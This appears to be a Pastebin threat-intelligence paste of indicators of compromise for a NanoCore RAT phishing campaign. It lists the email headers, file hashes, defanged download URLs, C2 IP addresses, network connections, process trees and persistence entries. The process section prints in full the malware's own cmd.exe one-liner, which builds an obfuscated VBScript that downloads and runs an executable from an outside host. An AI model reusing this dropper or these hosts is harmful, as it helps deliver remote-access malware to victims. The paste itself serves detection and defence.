Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #IOC #OptiData #VR #nanocore #RAT #macro
- https://pastebin.com/yiaWaNvQ
- previous_contact:
- 25/04/19 https://pastebin.com/cSy68j5q
- 07/01/19 https://pastebin.com/e5f24Y8F
- FAQ: https://krebsonsecurity.com/2018/02/bot-roundup-avalanche-kronos-nanocore/
- attack_vector
- --------------
- email attach .DOC > macro > GET JS > GET exe
- email_headers
- --------------
- Received: from lrwdd2.directrouter.com (lrwdd2.directrouter.com [206.123.119.186])
- Date: Mon, 05 Aug 2019 04:22:00 -0500
- From: cellardoor@palmerwines.com.au
- To: user00@victim77.com
- Subject: Fwd: Purchasing Oder
- X-Sender: cellardoor@palmerwines.com.au
- User-Agent: Roundcube Webmail/1.3.8
- files
- --------------
- SHA-256 ff1fe92b711075243cbb176d5e98dd07478a809db12c2189bb12a3874f10339c
- File name PO URGENT.doc
- File size 508 KB (520192 bytes)
- SHA-256 1148d46151ef33f158bab7fb99a6cd84f3b27a627994bd5f2a55b5fea029e55f
- File name azz.js
- File size 80.05 KB (81970 bytes)
- SHA-256 b3e668b755ceb4754b118ba8ec718755f4dbd37ef572a268e1d5b2a8d6d07ba7
- File name hercilio.exe
- File size 203 KB (207872 bytes)
- activity
- **************
- PL_SCR
- h11ps\kcexports{.} me/azz.js
- h11ps\kcexports{.} me/hercilio.exe
- C2
- 67.207.93.17
- 185.244.31.111 1606
- netwrk
- --------------
- [ssl]
- 167.71.13.65 kcexports.me Client Hello
- comp
- --------------
- WINWORD.EXE 2888 TCP localhost 49217 162.255.119.195 443 SYN_SENT
- wscript.exe 1124 TCP localhost 49219 162.255.119.195 443 SYN_SENT
- wscript.exe 2664 TCP localhost 49222 67.207.93.17 7744 SYN_SENT
- EJV.EXE 1368 TCP localhost 49226 185.244.31.111 1606 SYN_SENT
- proc
- --------------
- "C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" /n /dde
- "C:\Windows\System32\WScript.exe" "C:\tmp\mczekg5e.js"
- "C:\Windows\System32\wscript.exe" //B "C:\Users\operator\AppData\Roaming\KQWPXSGZoR.js"
- "C:\Windows\System32\cmd.exe" /c cd %temp% &@echo Y3x = " h11ps\kcexports{.} me/hercilio.exe">>B3g.vbs &@echo W8r = M8m("jo{Sj}j")>>B3g.vbs &@echo Set S5z = CreateObject(M8m("rx}rqWS}rqmyyu"))>>B3g.vbs &@echo S5z.Open M8m("ljy"), Y3x, False>>B3g.vbs &@echo S5z.send ("")>>B3g.vbs &@echo Set J8g = CreateObject(M8m("fitigSxywjfr"))>>B3g.vbs &@echo J8g.Open>>B3g.vbs &@echo J8g.Type = 1 >>B3g.vbs &@echo J8g.Write S5z.ResponseBody>>B3g.vbs & @echo J8g.Position = 0 >>B3g.vbs &@echo J8g.SaveToFile W8r, 2 >>B3g.vbs &@echo J8g.Close>>B3g.vbs &@echo function M8m(H7m) >> B3g.vbs &@echo For B6c = 1 To Len(H7m) >>B3g.vbs &@echo E7e = Mid(H7m, B6c, 1) >>B3g.vbs &@echo E7e = Chr(Asc(E7e)- 37) >>B3g.vbs &@echo O9c = O9c + E7e >> B3g.vbs &@echo Next >>B3g.vbs &@echo M8m = O9c >>B3g.vbs &@echo End Function >>B3g.vbs& B3g.vbs &dEl B3g.vbs & timeout 13 & EJV.EXE
- "C:\Windows\System32\WScript.exe" "C:\tmp\B3g.vbs"
- C:\Windows\SysWOW64\timeout 13
- C:\tmp\EJV.EXE
- persist
- --------------
- @HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 05.08.2019 18:05
- ARP Service c:\users\operator\appdata\roaming\9907dcbd-0284-49da-87e9-3f380347acb7\arp service\arpsv.exe 22.02.2015 3:49
- KQWPXSGZoR c:\users\operator\appdata\roaming\kqwpxsgzor.js 05.08.2019 18:04
- wscript.exe //B "C:\Users\operator\AppData\Roaming\KQWPXSGZoR.js"
- @C:\Users\operator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup 05.08.2019 18:04
- KQWPXSGZoR.js c:\users\operator\appdata\roaming\microsoft\windows\start menu\programs\startup\kqwpxsgzor.js 05.08.2019 18:04
- drop
- --------------
- %temp%\mczekg5e.js [azz[1].js]
- %temp%\B3g.vbs
- %temp%\EJV.EXE [hercilio[1].exe]
- C:\Users\operator\AppData\Roaming\KQWPXSGZoR.js
- C:\Users\operator\AppData\Roaming\9907DCBD-0284-49DA-87E9-3F380347ACB7\ARP Service\arpsv.exe
- C:\Users\operator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KQWPXSGZoR.js
- # # #
- https://www.virustotal.com/gui/file/ff1fe92b711075243cbb176d5e98dd07478a809db12c2189bb12a3874f10339c/details
- https://www.virustotal.com/gui/file/1148d46151ef33f158bab7fb99a6cd84f3b27a627994bd5f2a55b5fea029e55f/details
- https://www.virustotal.com/gui/file/b3e668b755ceb4754b118ba8ec718755f4dbd37ef572a268e1d5b2a8d6d07ba7/details
- https://analyze.intezer.com/#/analyses/919c9d77-4d63-4f96-a35b-0a5435c1297d
- VR
- @
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement